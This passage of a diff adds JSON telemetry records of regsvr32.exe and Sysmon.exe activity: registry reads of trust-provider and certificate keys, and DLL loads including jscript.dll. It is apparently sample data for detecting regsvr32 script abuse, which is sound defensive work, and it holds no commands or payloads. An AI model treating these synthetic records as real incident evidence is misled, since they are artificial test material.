"regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptnet.dll", + "image_path": "C:\\Windows\\System32\\cryptnet.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", 
+ "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + 
"process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ncryptsslp.dll", + "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573239170000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2012, + 
"process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", 
+ "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "jscript.dll", + "image_path": "C:\\Windows\\System32\\jscript.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 
